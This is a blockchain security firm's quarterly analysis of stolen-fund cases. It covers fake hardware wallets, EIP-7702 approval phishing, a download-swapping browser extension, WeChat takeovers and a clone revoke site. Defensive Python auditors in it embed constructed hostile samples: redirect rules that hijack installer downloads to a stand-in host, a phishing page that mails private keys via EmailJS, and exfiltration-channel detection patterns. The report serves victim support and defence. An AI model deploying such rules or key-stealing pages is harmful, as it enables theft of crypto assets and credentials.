SlowMist: 2025 Q2 MistTrack Stolen Funds Analysis
Author: Lisa
Editor: Sherry
Since SlowMist launched the MistTrack stolen fund report submission feature, we have received a large number of help requests from victims every day, seeking support for fund tracing and recovery. Some of these cases involve losses in the tens of millions of USD.
Based on this, we have launched this quarterly series to collect statistics and conduct analysis on the stolen fund reports we receive, aiming to dissect both common and uncommon attack methods through real (anonymized) cases. The goal is to help industry participants better understand and guard against security risks, and to protect their assets.
According to statistics, the MistTrack Team received a total of 429 stolen fund reports in Q2 2025, including 278 domestic submissions and 151 overseas submissions. We provided free community-level assessment services for all of these cases.
(P.S. This figure only includes cases submitted via the form; it does not cover reports received by email or other channels.)
In Q2, the MistTrack Team assisted 11 victims in successfully freezing or recovering approximately $11.95 million in stolen assets.
Causes of Theft
Among all malicious tactics observed in Q2 2025, phishing became the top cause of stolen assets. Next, we’ll walk through several representative cases to help everyone better avoid traps, prevent theft, and protect their assets.
1. Fake Hardware Wallets
This quarter, we encountered several asset theft incidents involving hardware wallets. Almost all of the victims believed they had taken sufficient security measures, but their actual handling of the devices had fatal flaws.
For instance, one victim contacted the SlowMist security team and reported that they had purchased a tampered cold wallet from Douyin (TikTok China), which led to the theft of approximately $6.5 million in crypto assets.
In another similar case, a user bought a hardware wallet from an e-commerce platform; it arrived with complete packaging and a user manual. The attacker had activated the device beforehand and recorded its mnemonic phrase, then repackaged the wallet with a fake manual and sold it through unofficial channels. As soon as the user scanned the QR code in the manual to "activate" the wallet and transferred assets to the wallet address, the funds were drained. This is the standard pattern of fake-wallet theft.
There was also a case in which someone received a "prize giveaway" cold wallet. The attacker posed as a well-known manufacturer on social media and mailed cold wallet devices for free under the pretense of "lottery draws" or "airdrops". Although the device appeared brand new and factory-sealed, with the seal intact, the user followed the included "manual" and entered the mnemonic phrase, never realizing that the device was a preconfigured phishing trap.
Some attackers even leveraged personal information leaked in previous data breaches to fabricate “official notification letters,” which were sent to users along with an “upgraded hardware wallet.” The letter claimed that the user’s original device had security vulnerabilities and instructed them to migrate their mnemonic phrase to the new “secure device.”
These replacement devices often came with pre-installed malicious firmware or guided users to input their mnemonic phrase into fake software. Once the migration was completed, the attackers immediately transferred the assets out.
In summary, the problem does not really lie with cold wallets themselves, but with the widespread lack of awareness among users of how to verify a hardware wallet's authenticity (buy only from the manufacturer or an authorized reseller, and check the device with the vendor's own verification procedure), of the secure initialization process (generate the mnemonic on the device yourself, and never accept one supplied with the device or printed in a manual), and of common attack methods. Many users fall victim to these scams under an illusion of "apparent security", assuming that using a cold wallet means complete safety, when in fact this is just another form of social engineering.
2. EIP-7702 Phishing
In Q2, a new phishing technique emerged that exploits EIP-7702. In one case, a user was targeted by the Inferno Drainer group during an EIP-7702 authorization flow, resulting in a loss of over $140,000.
The attacker's method was not technically complex, but it did show some "creativity". In this case the attacker did not use conventional phishing to get the user's EOA delegated to an attacker-controlled EIP-7702 contract. In fact, the delegation target was not a phishing address at all; it was a legitimate contract that had existed for several days:
MetaMask: EIP-7702 Delegator (0x63c0c19a282a1B52b07dD5a65b58948A07DAE32B).
The phishing scheme abused the batch-execution mechanism that the MetaMask EIP-7702 Delegator provides, enabling the attacker to push bulk token approvals from the victim's address and eventually drain the assets.
What makes this phishing method so effective is the delegation mechanism introduced by EIP-7702: once an EOA delegates to a contract, the EOA inherits that contract's behavior (batch transfers, mass approvals, gas abstraction, and so on), and the delegation stays in force until the EOA signs a new authorization that replaces or clears it. If the user delegates to a malicious contract the risk is obvious; but even when the delegated contract is legitimate, a phishing site can still abuse the delegated capabilities and cause asset loss.
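As an added illustration (example code written for this article, not SlowMist's or MetaMask's), the Python below performs the two checks this case calls for: it reads the EIP-7702 delegation designator from an EOA's code to see which contract the account points at, and it inspects a batch of calls that the delegated EOA is being asked to execute, flagging approvals that are unlimited or go to a spender not on an allowlist. The (to, value, data) representation of the batch and every address except the MetaMask Delegator quoted above are assumptions; the delegator's actual ABI is not reproduced.

```python
# Added example (not SlowMist's code). Two offline checks around an EIP-7702 delegation:
#  1) read the delegation designator stored as the EOA's code (format from EIP-7702:
#     0xef0100 || 20-byte address);
#  2) inspect a batch of calls the delegated EOA is asked to execute and flag ERC-20
#     approvals that go to an unknown spender or are unlimited.
# The (to, value, data) batch representation is an assumption; the MetaMask
# Delegator's own ABI is not reproduced here.
from dataclasses import dataclass
from typing import List, Optional, Tuple

DELEGATION_PREFIX = bytes.fromhex("ef0100")   # EIP-7702 delegation designator prefix
APPROVE_SELECTOR = bytes.fromhex("095ea7b3")  # keccak256("approve(address,uint256)")[:4]
MAX_UINT256 = (1 << 256) - 1

# Delegation target quoted in the article (MetaMask: EIP-7702 Delegator).
METAMASK_DELEGATOR = "0x63c0c19a282a1B52b07dD5a65b58948A07DAE32B"


def delegation_target(code: bytes) -> Optional[str]:
    """Return the address an EOA is delegated to, or None if its code is not a designator."""
    if len(code) == 23 and code.startswith(DELEGATION_PREFIX):
        return "0x" + code[3:].hex()
    return None


@dataclass
class Call:
    to: str       # contract receiving the call (for approvals: the ERC-20 token)
    value: int    # wei attached
    data: bytes   # ABI-encoded calldata


def encode_approve(spender: str, amount: int) -> bytes:
    """ABI-encode approve(spender, amount); used only to build the sample batch below."""
    return APPROVE_SELECTOR + bytes(12) + bytes.fromhex(spender[2:]) + amount.to_bytes(32, "big")


def decode_approve(data: bytes) -> Optional[Tuple[str, int]]:
    """Return (spender, amount) if `data` is an ERC-20 approve call, else None."""
    if len(data) != 68 or data[:4] != APPROVE_SELECTOR:
        return None
    spender = "0x" + data[16:36].hex()          # last 20 bytes of the first 32-byte word
    amount = int.from_bytes(data[36:68], "big")
    return spender, amount


def audit_batch(calls: List[Call], trusted_spenders: List[str]) -> List[dict]:
    """Flag approvals in a batch that a wallet should refuse to sign blindly."""
    trusted = {s.lower() for s in trusted_spenders}
    findings = []
    for index, call in enumerate(calls):
        decoded = decode_approve(call.data)
        if decoded is None:
            continue                                # not an approval; out of scope here
        spender, amount = decoded
        reasons = []
        if spender.lower() not in trusted:
            reasons.append("spender not on allowlist")
        if amount == MAX_UINT256:
            reasons.append("unlimited approval")
        if reasons:
            findings.append({"index": index, "token": call.to, "spender": spender, "reasons": reasons})
    return findings


# Constructed sample data (placeholder addresses, not from the real incident).
DRAINER = "0x" + "d" * 40
TOKEN_A = "0x" + "a1" * 20
TOKEN_B = "0x" + "b2" * 20
SAMPLE_CODE = DELEGATION_PREFIX + bytes.fromhex(METAMASK_DELEGATOR[2:])
SAMPLE_BATCH = [
    Call(TOKEN_A, 0, encode_approve(DRAINER, MAX_UINT256)),
    Call(TOKEN_B, 0, encode_approve(DRAINER, MAX_UINT256)),
    Call(TOKEN_A, 0, bytes.fromhex("a9059cbb") + bytes(64)),  # transfer(...)-shaped call, not an approval
]

if __name__ == "__main__":
    # Step 1: the delegation target is the legitimate MetaMask contract...
    print("delegated to:", delegation_target(SAMPLE_CODE))
    # Step 2: ...yet the batch it is asked to run hands every token to one spender.
    for finding in audit_batch(SAMPLE_BATCH, trusted_spenders=[]):
        print(finding)
```

The sample batch reproduces the lesson of this case: the delegation target is the legitimate MetaMask contract, so a check of the target alone passes, while the batch content grants two tokens to a single unknown spender with unlimited approvals. A wallet needs to show the decoded batch, not just the delegation target.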
EIP-7702 certainly brings new possibilities for wallet functionality, but new capabilities bring new risk boundaries. Before signing anything, users should insist on "what you see is what you sign", and be clear about who they are authorizing and what that party is allowed to do.
For more on how to mitigate risks associated with EIP-7702, refer to our earlier article: “In-Depth Discussion on EIP-7702 and Best Practices.”
3. Malicious Browser Extensions
In Q2, we observed a particularly stealthy attack vector: browser extensions masquerading as security plugins. One such Chrome extension reported to us was called "Osiris". After an in-depth investigation we confirmed that, although it claimed to detect phishing links and suspicious websites, it showed clear signs of malicious behavior itself.
Attackers typically promoted the extension on social platforms with educational or "security recommendation" content, getting users to install it voluntarily. Once installed, the extension used a browser extension API to fetch network-interception rules from a remote, attacker-controlled server. We found that these rules were written specifically to intercept downloads of .exe, .dmg, .zip and similar file types and silently replace the user's intended download with a malicious program.
Even more insidiously, attackers steered users toward well-known, commonly used websites such as Notion or Zoom. When the user downloaded software from these official sites, the file delivered had already been swapped for a malicious one, yet the browser still displayed the download as coming from the legitimate source, making the substitution nearly impossible for users to notice.
The malicious payloads collected sensitive information from the victim's computer, including local Chrome browser data and macOS Keychain credentials, and uploaded it to the attacker's server. From there, attackers could extract seed phrases, private keys or login credentials, steal crypto assets, and potentially hijack exchange accounts, social media profiles and more.
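As an added example (not the extension's code and not SlowMist's tooling), the Python below audits an extension the way one would check for the behavior described above: it reports manifest permissions that allow traffic rewriting, then scans a rule set for redirect rules aimed at installer downloads and reports where they send the request. The rule format is that of Chrome's declarativeNetRequest API; that this is the "browser extension API" the malicious extension used is an assumption, and the manifest, rules and host names are constructed.

```python
# Added example (not the extension's code and not SlowMist's): audit what a Chrome
# extension's manifest and its network-interception rules can do. The rule shape follows
# Chrome's declarativeNetRequest API; that this is the API the malicious extension used
# is an assumption, and the manifest and rules below are constructed.
import re
from typing import Optional
from urllib.parse import urlparse

# Permissions that let an extension block, redirect or rewrite other sites' traffic.
TRAFFIC_PERMISSIONS = {
    "declarativeNetRequest",
    "declarativeNetRequestWithHostAccess",
    "webRequest",
    "webRequestBlocking",
}
# Matches ".exe", "\.(exe|dmg|zip)", ".(tar|pkg)" etc. inside a urlFilter/regexFilter string.
INSTALLER_RE = re.compile(r"\\?\.\(?(?:[a-z]+\|)*(?:exe|dmg|zip|pkg|msi)", re.I)


def audit_manifest(manifest: dict) -> dict:
    """Report traffic-rewriting permissions and whether the extension can reach every host."""
    perms = sorted(set(manifest.get("permissions", [])) & TRAFFIC_PERMISSIONS)
    hosts = manifest.get("host_permissions", []) + manifest.get("permissions", [])
    all_hosts = any(h in ("<all_urls>", "*://*/*", "http://*/*", "https://*/*") for h in hosts)
    return {"traffic_permissions": perms, "all_hosts": all_hosts}


def redirect_host(action: dict) -> Optional[str]:
    """Host a redirect rule sends the request to (from a fixed url or a regexSubstitution)."""
    redirect = action.get("redirect", {})
    target = redirect.get("url") or redirect.get("regexSubstitution") or ""
    return urlparse(target).hostname


def audit_rules(rules: list) -> list:
    """Flag rules that redirect installer downloads (.exe/.dmg/.zip/...) elsewhere."""
    findings = []
    for rule in rules:
        action = rule.get("action", {})
        condition = rule.get("condition", {})
        pattern = condition.get("regexFilter") or condition.get("urlFilter") or ""
        if action.get("type") != "redirect" or not INSTALLER_RE.search(pattern):
            continue
        findings.append({
            "id": rule.get("id"),
            "filter": pattern,
            "redirect_to": redirect_host(action),
        })
    return findings


# Constructed sample: what a manifest and a remotely fetched rule set could look like.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "name": "Example Phishing Blocker (constructed sample)",
    "permissions": ["declarativeNetRequest", "declarativeNetRequestWithHostAccess", "storage"],
    "host_permissions": ["<all_urls>"],
}
SAMPLE_RULES = [
    {   # swaps any .exe/.dmg/.zip download for a file of the same name on another host
        "id": 1, "priority": 1,
        "action": {"type": "redirect",
                   "redirect": {"regexSubstitution": "https://updates-cdn.example/dl/\\1"}},
        "condition": {"regexFilter": r"^https://[^/]+/.*/([^/]+\.(exe|dmg|zip))$",
                      "resourceTypes": ["main_frame", "other"]},
    },
    {   # a benign-looking block rule, the kind a real anti-phishing extension would ship
        "id": 2, "priority": 1,
        "action": {"type": "block"},
        "condition": {"urlFilter": "||phish-tracker.example", "resourceTypes": ["script"]},
    },
    {   # fixed-URL variant targeting macOS packages
        "id": 3, "priority": 1,
        "action": {"type": "redirect",
                   "redirect": {"url": "https://updates-cdn.example/dl/setup.pkg"}},
        "condition": {"urlFilter": "*.pkg", "resourceTypes": ["main_frame"]},
    },
]

if __name__ == "__main__":
    print(audit_manifest(SAMPLE_MANIFEST))
    for finding in audit_rules(SAMPLE_RULES):
        print(finding)
```

Two points follow from running it: the permission pair plus "<all_urls>" is what makes remote rule loading dangerous in the first place, and a rule set fetched at runtime is not visible in the store listing, so auditing the manifest alone is not enough; the rules actually installed on the machine have to be inspected.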
Recommendations:
- Avoid installing browser extensions or applications recommended by strangers — even if they appear “official”.
- Regularly audit and remove unused or suspicious extensions.
- Consider using reputable extension managers or antivirus tools to improve detection and protection.
4. WeChat Account Hijacking
In Q2, we received numerous reports from users whose WeChat accounts had been compromised. After gaining control of an account, attackers would impersonate the user and scam their contacts with offers to buy USDT at a discount, causing financial losses for the victim's friends and acquaintances. In more serious cases, the attackers even changed the account password and silently took full control.
Unlike traditional on-chain security risks, this type of attack exploits the trust relationships inherent in social platforms.
We have not yet definitively confirmed how these hijackings occur, but testing and user feedback suggest a possible path:
- The attacker obtains the victim’s WeChat username and password, likely due to credential leaks from other platforms, reused passwords, or brute-force attacks.
- When logging in from an unfamiliar device, WeChat triggers a secondary verification process, one option being to ask a “frequent contact” to verify the login.
- Our testing revealed that WeChat’s definition of “frequent contact” is quite broad — sometimes just being in the same group chat or having sent a few messages can qualify.
- If the attacker has previously added the victim as a contact and waited patiently, they can initiate the login at night or while the victim is offline, and have their own accomplice account, which by then qualifies as a "frequent contact", approve the login. This significantly increases the chance of a successful hijack.
While this scenario remains speculative, it highlights an important point: Web3 users' security boundary now extends beyond the chain into social networks and contact circles.
5. Social Engineering Attacks
We were also contacted in Q2 by a user reporting an issue with an irrevocable “risky authorization” in their wallet. They had attempted multiple times to revoke the approval, but to no avail. Believing it might be tied to a past token swap, they reached out to SlowMist for help.
Using common explorers and revoke tools, we couldn’t locate the authorization they referred to. Later, the user shared another screenshot — but we noticed the wallet address had changed. We asked them to send over the URL of the tool they used for checking, and that’s when we uncovered the problem.
The site, called Signature Checker (signature[.]land), was a near-perfect clone of the popular Revoke Cash interface — including a deceptively similar logo. However, this site asked users to input their private key to “check for risky signatures”, which is a clear phishing red flag.
We tested the site with various addresses. No matter which address we entered, it always showed recent “risky approvals” and warned that urgent revocation was needed — creating a false sense of urgency. Even when entering a fake private key with formatting errors, the site still submitted the data via a network request.
Analysis of the front-end code confirmed that the phishing site used EmailJS to send users' input, including private keys and addresses, to an attacker's email inbox. It also called the Etherscan API to check whether an entered address was valid, which made it look more legitimate.
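As an added example of the kind of front-end triage described above (example code written for this article, not SlowMist's tooling; the real site's source is not reproduced), the Python below parses a page, lists input fields that ask for a private key or mnemonic, and searches the scripts for third-party delivery services such as EmailJS and for the hosts the page contacts. It generalizes slightly beyond the article's EmailJS case by also listing a couple of other form-delivery services as indicators. The HTML sample is constructed to mimic the pattern described: an address field, a private-key field, an Etherscan call for plausibility, and an EmailJS send. The host name checker.example is a placeholder.

```python
# Added example (not SlowMist's tooling; the real site's source is not reproduced here):
# offline triage of a suspected "approval checker" page. It extracts form fields that
# request secrets and scripts that ship input to a third party (the article describes
# EmailJS in this role). The HTML below is a constructed stand-in.
import re
from html.parser import HTMLParser
from typing import List

SECRET_FIELD_RE = re.compile(r"private\s*key|privkey|mnemonic|seed\s*phrase|recovery\s*phrase", re.I)
# Third-party delivery services a static web page can use to mail form input anywhere.
EXFIL_RE = re.compile(r"api\.emailjs\.com|emailjs\.(init|send|sendForm)\b|formspree\.io|api\.telegram\.org/bot", re.I)
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+")


class PageCollector(HTMLParser):
    """Collect <input> descriptors and <script> bodies/sources from a page."""
    def __init__(self) -> None:
        super().__init__()
        self.inputs: List[str] = []
        self.scripts: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            attr = dict(attrs)
            self.inputs.append(" ".join(filter(None, (attr.get("name"), attr.get("id"), attr.get("placeholder")))))
        elif tag == "script":
            self._in_script = True
            src = dict(attrs).get("src")
            if src:
                self.scripts.append(f"src={src}")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)


def triage_page(html: str, page_host: str) -> dict:
    """Return the secret-requesting fields, exfil indicators and foreign hosts found in `html`."""
    collector = PageCollector()
    collector.feed(html)
    secret_fields = [f for f in collector.inputs if SECRET_FIELD_RE.search(f)]
    script_text = "\n".join(collector.scripts)
    exfil = sorted({m.group(0) for m in EXFIL_RE.finditer(script_text)})
    foreign_hosts = sorted({u.split("//", 1)[1] for u in URL_RE.findall(script_text)
                            if not u.endswith(page_host)})
    return {
        "secret_fields": secret_fields,
        "exfil_indicators": exfil,
        "foreign_hosts": foreign_hosts,
        # A read-only approval checker needs only an address; asking for a key is disqualifying.
        "verdict": "phishing" if secret_fields and (exfil or foreign_hosts) else "review",
    }


# Constructed sample page mimicking the pattern described in the article (not the real site).
SAMPLE_HTML = """
<html><body>
<h1>Signature Checker</h1>
<form id="check">
  <input name="address" placeholder="Wallet address">
  <input name="privateKey" placeholder="Private key (required to scan risky signatures)">
  <button>Check</button>
</form>
<script src="https://cdn.emailjs.example/email.min.js"></script>
<script>
  emailjs.init("user_xxx");
  document.getElementById("check").onsubmit = async (e) => {
    e.preventDefault();
    const addr = document.querySelector("[name=address]").value;
    await fetch("https://api.etherscan.io/api?module=account&action=balance&address=" + addr);
    // shows "risky approvals" regardless of what the API returned
    await emailjs.send("service_xxx", "template_xxx", {
      address: addr, key: document.querySelector("[name=privateKey]").value });
  };
</script>
</body></html>
"""

if __name__ == "__main__":
    print(triage_page(SAMPLE_HTML, "checker.example"))
```

A legitimate approval checker reads public on-chain state and needs nothing but an address, so any field requesting a key or seed phrase is disqualifying on its own; the verdict logic treats the delivery channel as confirmation rather than as the deciding factor.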
And how did the victim even find this site? It all started with a comment or private message on a social platform, saying something like:
“You signed a phishing transaction. Please cancel the authorization immediately.” followed by a link to the fake tool.
Worse, when the user grew suspicious, the attacker impersonated a SlowMist employee in an attempt at a second round of social engineering. This was no ordinary phishing scam; it was a carefully staged setup.
These social engineering attacks are not technically sophisticated, but they excel at exploiting urgency and trust. Attackers know that a phrase such as "risky signature detected" triggers panic and prompts hasty action. Once that emotional state is triggered, it is much easier to push people into doing things they normally would not, such as clicking links or handing over sensitive information.
Final Thoughts
Looking back on Q2, one trend stands out: attackers' methods are not necessarily getting more technically advanced, but they are becoming more psychologically manipulative. We are seeing a clear shift from purely on-chain attacks to off-chain entry points: browser extensions, social media accounts, authentication flows and user behavior are all becoming common attack surfaces. However the technology evolves, two principles remain timeless:
- Maintain skepticism and verify everything.
- Treat every authorization or signature as unlocking a door: make sure you know who is on the other side.
We also strongly recommend re-reading the Blockchain Dark Forest Selfguard Handbook. This guide is not just about surviving attacks; it is about understanding the mindset needed to avoid becoming prey in a digital jungle.
If you’ve fallen victim to cryptocurrency theft, we offer free community assistance to help evaluate your case. Simply submit the appropriate form based on the incident type (stolen funds, scam, or extortion). The hacker’s address you provide will also be shared with SlowMist InMist Lab’s Threat Intelligence Network for further risk control actions.
- Submit the Chinese form here: https://aml.slowmist.com/cn/recovery-funds.html
- Submit the English form here: https://aml.slowmist.com/recovery-funds.html
SlowMist has been deeply involved in the Anti-Money Laundering (AML) field for many years, developing a comprehensive and efficient solution that covers compliance, investigations, and audits. We are committed to fostering a healthy cryptocurrency ecosystem and providing professional services to the Web3 industry, financial institutions, regulatory bodies, and compliance departments. Our MistTrack platform offers compliance investigation services that include wallet address analysis, fund monitoring, and tracing. To date, MistTrack has accumulated over 300 million address tags, more than 1,000 address entities, 500,000+ threat intelligence data points, and 90 million+ risk addresses, providing strong protection against money laundering and ensuring digital asset security.
About SlowMist
SlowMist is a blockchain security firm established in January 2018. It was founded by a team with over ten years of network security experience and has grown into a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.
SlowMist offers a variety of services that include but are not limited to security audits, threat intelligence, defense deployment, security consulting, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring), SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.
By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.